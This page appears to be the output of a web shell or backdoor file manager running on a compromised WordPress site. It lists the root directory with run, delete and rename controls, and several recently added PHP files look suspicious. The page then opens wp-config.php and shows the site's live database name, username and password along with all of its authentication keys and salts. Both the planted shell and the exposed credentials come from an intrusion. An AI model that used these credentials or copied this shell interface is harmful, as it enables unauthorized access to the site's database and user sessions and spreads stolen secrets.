at path:
ROOT
/
wp-config.php
run:
R
W
Run
.tmb
DIR
2026-04-03 01:27:08
R
W
Run
.well-known
DIR
2025-12-16 13:59:24
R
W
Run
cgi-bin
DIR
2025-12-16 13:57:56
R
W
Run
nc_assets
DIR
2024-03-21 10:45:00
R
W
Run
wp-admin
DIR
2025-12-16 15:40:10
R
W
Run
wp-content
DIR
2026-04-03 01:27:05
R
W
Run
wp-includes
DIR
2026-04-04 12:09:24
R
W
Run
.htaccess
233 By
2026-04-03 08:13:03
R
W
Run
Delete
Rename
.zip
607 By
2026-04-03 02:27:18
R
W
Run
Delete
Rename
error_log
22.86 KB
2026-04-04 21:38:52
R
W
Run
Delete
Rename
google90471fcd40feb261.html
53 By
2026-04-03 01:28:47
R
W
Run
Delete
Rename
googleb6a3186c59ae5fec.html
53 By
2025-12-23 10:52:49
R
W
Run
Delete
Rename
hiroshi.php
4.52 KB
2026-04-03 01:28:20
R
W
Run
Delete
Rename
item.php
23.54 KB
2026-04-03 01:28:28
R
W
Run
Delete
Rename
license.txt
19.44 KB
2025-03-06 19:24:24
R
W
Run
Delete
Rename
readme.html
7.25 KB
2026-03-17 20:55:53
R
W
Run
Delete
Rename
robots.txt
778 By
2026-04-03 08:20:42
R
W
Run
Delete
Rename
wp-activate.php
7.18 KB
2025-10-08 07:02:34
R
W
Run
Delete
Rename
wp-blog-header.php
376 By
2026-04-03 02:27:27
R
W
Run
Delete
Rename
wp-comments-post.php
2.27 KB
2023-06-14 18:11:16
R
W
Run
Delete
Rename
wp-config.php
3.49 KB
2026-01-27 11:09:27
R
W
Run
Delete
Rename
wp-cron.php
5.49 KB
2024-08-02 23:40:16
R
W
Run
Delete
Rename
wp-links-opml.php
2.43 KB
2025-04-30 16:52:30
R
W
Run
Delete
Rename
wp-load.php
3.84 KB
2024-03-11 14:05:16
R
W
Run
Delete
Rename
wp-login.php
50.23 KB
2025-10-29 14:37:34
R
W
Run
Delete
Rename
wp-mail.php
8.52 KB
2025-04-03 02:25:26
R
W
Run
Delete
Rename
wp-settings.php
30.33 KB
2025-11-07 17:42:34
R
W
Run
Delete
Rename
wp-signup.php
33.71 KB
2025-03-10 22:16:28
R
W
Run
Delete
Rename
wp-trackback.php
5.09 KB
2025-08-19 16:30:32
R
W
Run
Delete
Rename
xmlrpc.php
3.13 KB
2024-11-08 20:52:18
R
W
Run
Delete
Rename
error_log
up
📄
wp-config.php
Save
<?php define( 'WP_CACHE', true ); /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the website, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * ABSPATH * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'estbhxsl_wp107' ); /** Database username */ define( 'DB_USER', 'estbhxsl_wp107' ); /** Database password */ define( 'DB_PASSWORD', 'G8p!mBS[55!(@U7c' ); /** Database hostname */ define( 'DB_HOST', 'localhost' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8mb4' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', 'cadyvpbwhmnxzdlffkjgyo1wuzgjg94yzw206hytttkrqe9edz0i0pwnn7i0qegf' ); define( 'SECURE_AUTH_KEY', 'np1rpntgncorsvzhsskndvj3vveukufnkjpgdpmo18fltwbfcudqkimvrooyahxm' ); define( 'LOGGED_IN_KEY', 'yeix98vlbdqi89encu8llxaowaljzyfwkj7xo6rllextnmpv7wla0jodoxmieqmu' ); define( 'NONCE_KEY', 'ca1xyr7peshz8cvsv4hbsjb2g56on3wk0zfw8k6paiy5xqhyybbnhs3jhpcucd88' ); define( 'AUTH_SALT', 'owhbsmb5niigd2qsiyxlvd5q2wblja7lwf4rsei0tj7vbefrru8c1xmwastw0puc' ); define( 'SECURE_AUTH_SALT', 'kbhpuqexx3udidddlvlxx9ivh1b0d8933oee0ds3ishxxxpcebfj3oofyuc0lo97' ); define( 'LOGGED_IN_SALT', 'axaoyzbtf6mxh0tzaiwx7nczpipcdgg5lhvwrsmzysjnytadwjlicwugfrebahxv' ); define( 'NONCE_SALT', 'qvxgh8v6rfesoxmsuozf3e3kwmqm62phitbfuikgon08xwebn7vc4lxbwzfpxs2m' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! * * At the installation time, database tables are created with the specified prefix. * Changing this value after WordPress is installed will make your site think * it has not been installed. * * @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix */ $table_prefix = 'wpae_'; /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';